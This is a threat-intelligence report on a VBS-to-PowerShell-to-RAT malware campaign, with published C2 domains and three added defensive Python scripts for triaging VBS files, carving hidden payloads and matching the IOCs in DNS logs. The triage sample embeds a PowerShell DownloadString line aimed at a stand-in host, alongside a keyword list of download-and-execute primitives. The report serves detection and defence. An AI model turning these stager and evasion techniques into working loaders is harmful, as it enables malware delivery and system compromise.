Security analysts have uncovered a sophisticated cluster of cyberattacks that leverages heavily obfuscated Visual Basic Script (VBS) files to infiltrate networks and deploy powerful Remote Access Trojans (RATs).
The campaign, centred on the filename “sostener.vbs” (Spanish for “sustain”), affects 16 open directories across multiple hosts and networks, each serving as a conduit for a multi-phase malware installation system.
The attack, largely automated, employs a three-stage progression: initial VBS script execution, PowerShell script generation, and ultimate RAT deployment to grant threat actors remote control over victim systems.
Technical Breakdown: The Three-Stage Attack Pipeline
Stage 1: VBS Dropper Orchestrates Initial Penetration
The campaign begins with the execution of heavily obfuscated VBS files, which range in size from 2 to 3 MB.
These scripts are cluttered with useless code comments and dead variable assignments, which can confound analysis.
At runtime, the “sostener.vbs” script dynamically generates and executes a PowerShell script whose contents are embedded in a variable as a base64-encoded payload.
This method of encoding and transforming the payload means that only advanced malware detection tools, or manual analysis, will spot the threat before it escalates.
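To turn the Stage 1 description into something an analyst can run, here is an added triage script (not from the original report or any vendor tool) that scores a VBS file against three of the traits described above: file size, comment density, and long base64 runs that decode to PowerShell. The thresholds, the PowerShell token list and the sample VBS text are constructed assumptions for this example; the report only states that the droppers are 2 to 3 MB and padded with comments and dead variable assignments.

```python
import base64
import re

# Thresholds and token list are assumptions for this example; the report
# only says the droppers are 2-3 MB and padded with comments/dead variables.
LARGE_VBS_BYTES = 1_000_000
COMMENT_RATIO_MIN = 0.4
B64_MIN_LEN = 200
PS_TOKENS = ("powershell", "frombase64string", "downloadstring",
             "invoke-", "iex", "new-object")
B64_RE = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % B64_MIN_LEN)


def comment_ratio(vbs_text: str) -> float:
    """Fraction of non-empty lines that are VBS comments (' or Rem)."""
    lines = [ln.strip() for ln in vbs_text.splitlines() if ln.strip()]
    if not lines:
        return 0.0
    comments = sum(1 for ln in lines
                   if ln.startswith("'") or ln.lower().startswith("rem "))
    return comments / len(lines)


def embedded_powershell(vbs_text: str) -> list[str]:
    """Decode every long base64 run and keep those that read as PowerShell."""
    hits = []
    for m in B64_RE.finditer(vbs_text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        # Try UTF-16LE first (PowerShell's -EncodedCommand form), then UTF-8.
        for enc in ("utf-16le", "utf-8"):
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if any(tok in text.lower() for tok in PS_TOKENS):
                hits.append(text)
                break
    return hits


def triage_vbs(vbs_text: str, size_bytes: int) -> dict:
    """Score a VBS file against the three Stage 1 traits; higher = more suspicious."""
    decoded = embedded_powershell(vbs_text)
    traits = {
        "large_file": size_bytes >= LARGE_VBS_BYTES,
        "comment_heavy": comment_ratio(vbs_text) >= COMMENT_RATIO_MIN,
        "embedded_powershell": bool(decoded),
    }
    return {**traits, "score": sum(traits.values()), "decoded": decoded}


# --- Constructed sample: an inert, dropper-shaped VBS, not a real sample. ---
# The embedded PowerShell only references a non-resolvable .invalid host.
_SAMPLE_PS = ("$u = 'https://example.invalid/carrier.jpg'; "
              "$d = (New-Object Net.WebClient).DownloadString($u)")
_SAMPLE_B64 = base64.b64encode(_SAMPLE_PS.encode("utf-16le")).decode()
SAMPLE_VBS = "\n".join(
    ["' " + "filler comment " * 8] * 50                       # padding comments
    + [f"Dim unused{i}: unused{i} = {i}" for i in range(50)]  # dead assignments
    + [f'payload = "{_SAMPLE_B64}"']                          # encoded stage-2 script
)

if __name__ == "__main__":
    report = triage_vbs(SAMPLE_VBS, size_bytes=2_500_000)  # size as if on disk
    print({k: v for k, v in report.items() if k != "decoded"})
    for ps in report["decoded"]:
        print("decoded PowerShell:", ps)
```

The decoded strings are returned rather than executed, so the script can be pointed at quarantined files; a score of 3 on a file that arrived by e-mail or from an open directory is a reasonable trigger for a deeper look at the decoded PowerShell.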
Stage 2: PowerShell Stager Expands Attack Surface
Once the base64 payload is decoded, the resulting PowerShell script contacts various remote services, such as file hosting platforms, to download additional malicious components.
These include memory injectors and custom-built remote access trojans (RATs), such as LimeRAT, DCRat, AsyncRAT, and Remcos.
Some of these elements are cleverly hidden inside seemingly legitimate JPEG images on the Internet Archive or within plaintext files on platforms like paste[.]ee and Bitbucket.
The stager locates these payloads by searching for specific markers (e.g., “<<BASE64_START>>” and “<<BASE64_END>>”) within the image or text files, then decodes and loads them into memory.
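The marker scheme described for Stage 2 is also the easiest hook for an analyst: the same markers that let the stager find its payload let a triage script carve it out of a downloaded carrier for hashing and scanning. The following is an added example, not code from the report or from any vendor tool; it decodes but never executes what it finds. The JPEG-looking carrier and the fake "MZ" blob inside it are constructed for this example, and the PE check is only a header test.

```python
import base64
import hashlib
import re

# Markers quoted in the report for the marker-delimited payload scheme.
START_MARK = b"<<BASE64_START>>"
END_MARK = b"<<BASE64_END>>"


def carve_marked_payloads(carrier: bytes) -> list[dict]:
    """Find every START..END span in a carrier file, decode it, and describe it.

    Nothing is executed: the decoded bytes are only hashed and fingerprinted
    so they can be scanned or submitted for analysis.
    """
    found = []
    pos = 0
    while True:
        s = carrier.find(START_MARK, pos)
        if s < 0:
            break
        e = carrier.find(END_MARK, s + len(START_MARK))
        if e < 0:
            break
        blob = carrier[s + len(START_MARK):e]
        blob = re.sub(rb"\s+", b"", blob)  # tolerate wrapped/indented base64
        try:
            data = base64.b64decode(blob, validate=True)
        except ValueError:  # not valid base64 between the markers
            data = b""
        found.append({
            "offset": s,
            "decoded_ok": bool(data),
            "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest() if data else None,
            # PE files start with the 'MZ' DOS header; the report says the
            # carved components are injectors and RATs, i.e. executables.
            "is_pe": data[:2] == b"MZ",
        })
        pos = e + len(END_MARK)
    return found


# --- Constructed carrier: JPEG-looking bytes around a fake 'MZ' blob. ---
# _FAKE_PE is not an executable, just the header bytes a PE check keys on.
_FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 100
SAMPLE_CARRIER = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"      # JPEG SOI + APP0 header bytes
    + b"\x00" * 64                           # filler "image" data
    + START_MARK + base64.b64encode(_FAKE_PE) + END_MARK
    + b"\x00" * 32 + b"\xff\xd9"             # more filler + JPEG EOI
)

if __name__ == "__main__":
    for item in carve_marked_payloads(SAMPLE_CARRIER):
        print(item)
```

The hashes it produces can be compared with the file hashes the report associates with each stage, and the same function works on the plaintext pastes the article mentions, since it searches raw bytes rather than parsing the carrier as an image.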
Stage 3: Injector and RAT – Final Payload Deployment
The third stage sees the downloaded injector load the RAT directly into the system’s memory, bypassing disk-based detection.
The most frequently encountered remote access trojan (RAT) in this campaign is Remcos, which communicates with command-and-control (C2) servers through dynamic DNS domains (e.g., “duckdns[.]org”) to manage rotating IP addresses and evade network-based defenses.
Infrastructure overlap is evident, as multiple stage-one droppers frequently funnel into the same stage-two and stage-three components, with shared C2 servers and identical TLS certificate fingerprints providing clear links between seemingly disparate targets.
Attribution, Indicators, and Ongoing Threat
While definitive attribution remains challenging, the tactics, language, and infrastructure observed strongly suggest ties to APT-C-36 (Blind Eagle), a notorious Colombian threat actor known for similar campaigns.
However, analysts caution that confirmation is not possible without additional intelligence. Indicators of compromise (IOCs) include specific DNS domains (e.g., remc21[.]duckdns[.]org, sosten38999[.]duckdns[.]org, and others), TLS certificate fingerprints, and file hashes associated with each stage of the attack.
Security teams are urged to monitor for large, obfuscated VBS files and unexpected PowerShell activity, especially activity involving the domains and platforms mentioned above.
As the threat actors continue to evolve their techniques, organizations must prioritize endpoint protection, behavioral monitoring, and threat intelligence integration to stay ahead of this persistent and agile threat landscape.
This multi-phase attack, powered by obfuscated VBS files and culminating in advanced RAT deployments, underscores the evolving sophistication of cybercriminal groups.
Vigilance and robust security measures are essential for organizations seeking to defend against such complex, multi-stage intrusions.
IOCs
| Type | Indicator |
| --- | --- |
| DNS | remc21[.]duckdns[.]org |
| DNS | sosten38999[.]duckdns[.]org |
| DNS | rem25rem[.]duckdns[.]org |
| DNS | trabajonuevos[.]duckdns[.]org |
| DNS | gotemburgoxm[.]duckdns[.]org |
| DNS | dcupdate[.]duckdns[.]org |
| DNS | dgflex[.]duckdns[.]org |
| DNS | purelogs2025[.]duckdns[.]org |
| DNS | romanovas[.]duckdns[.]org |
| TLS FP (SHA-256) | 95f61fba6418c812c4c62d0c7ee4c8e5c369fc76e044cab6de3b6ddf787db2ed |
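Working from the IOC table and the monitoring advice earlier in the article, here is an added example (not from the report or any vendor tool) that refangs the published domains and TLS fingerprint, matches DNS queries against them, and separately flags any other query to the dynamic-DNS provider the report names, since the campaign rotates hosts there. The log format and the log lines are constructed for this example; the indicators themselves are the ones listed above.

```python
# IOC list as published in the report, in its defanged "[.]" form.
IOC_DOMAINS_DEFANGED = [
    "remc21[.]duckdns[.]org",
    "sosten38999[.]duckdns[.]org",
    "rem25rem[.]duckdns[.]org",
    "trabajonuevos[.]duckdns[.]org",
    "gotemburgoxm[.]duckdns[.]org",
    "dcupdate[.]duckdns[.]org",
    "dgflex[.]duckdns[.]org",
    "purelogs2025[.]duckdns[.]org",
    "romanovas[.]duckdns[.]org",
]
IOC_TLS_SHA256 = {
    "95f61fba6418c812c4c62d0c7ee4c8e5c369fc76e044cab6de3b6ddf787db2ed",
}
# Dynamic-DNS provider named in the report; any query here is worth a look
# even when the exact host is not yet on the IOC list.
DDNS_PARENTS = {"duckdns.org"}


def refang(name: str) -> str:
    """Turn a defanged or raw hostname into a normalised, comparable form."""
    return name.replace("[.]", ".").strip().lower().rstrip(".")


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}


def classify_query(qname: str):
    """'ioc_match' for a listed domain, 'ddns_watch' for the provider, else None."""
    q = refang(qname)
    if q in IOC_DOMAINS:
        return "ioc_match"
    if any(q == p or q.endswith("." + p) for p in DDNS_PARENTS):
        return "ddns_watch"
    return None


def classify_cert(fingerprint: str):
    """Match a certificate SHA-256 fingerprint (any case/separators) to the IOC."""
    fp = fingerprint.replace(":", "").replace(" ", "").lower()
    return "ioc_match" if fp in IOC_TLS_SHA256 else None


def scan_dns_log(text: str) -> list[tuple]:
    """Return (host, query, verdict) for every flagged line of a whitespace-
    separated 'timestamp host qname' log (a constructed shape for this example)."""
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 3:
            continue
        _ts, host, qname = parts[:3]
        verdict = classify_query(qname)
        if verdict:
            hits.append((host, refang(qname), verdict))
    return hits


# Constructed log lines, not from any real environment.
SAMPLE_LOG = """\
# ts host qname
2025-05-01T10:00:01Z WS-042 www.example.com
2025-05-01T10:00:07Z WS-042 remc21.duckdns.org
2025-05-01T10:01:15Z WS-017 sosten38999.DUCKDNS.ORG.
2025-05-01T10:02:30Z WS-017 somethingelse.duckdns.org
2025-05-01T10:03:00Z WS-101 archive.org
"""

if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_LOG):
        print(hit)
    print(classify_cert(next(iter(IOC_TLS_SHA256)).upper()))
```

Separating the exact-match verdict from the provider-level watch verdict keeps the noise manageable: an "ioc_match" should page someone, while a "ddns_watch" on a host that has no business using dynamic DNS is a hunting lead that can be combined with the VBS and PowerShell signals described earlier.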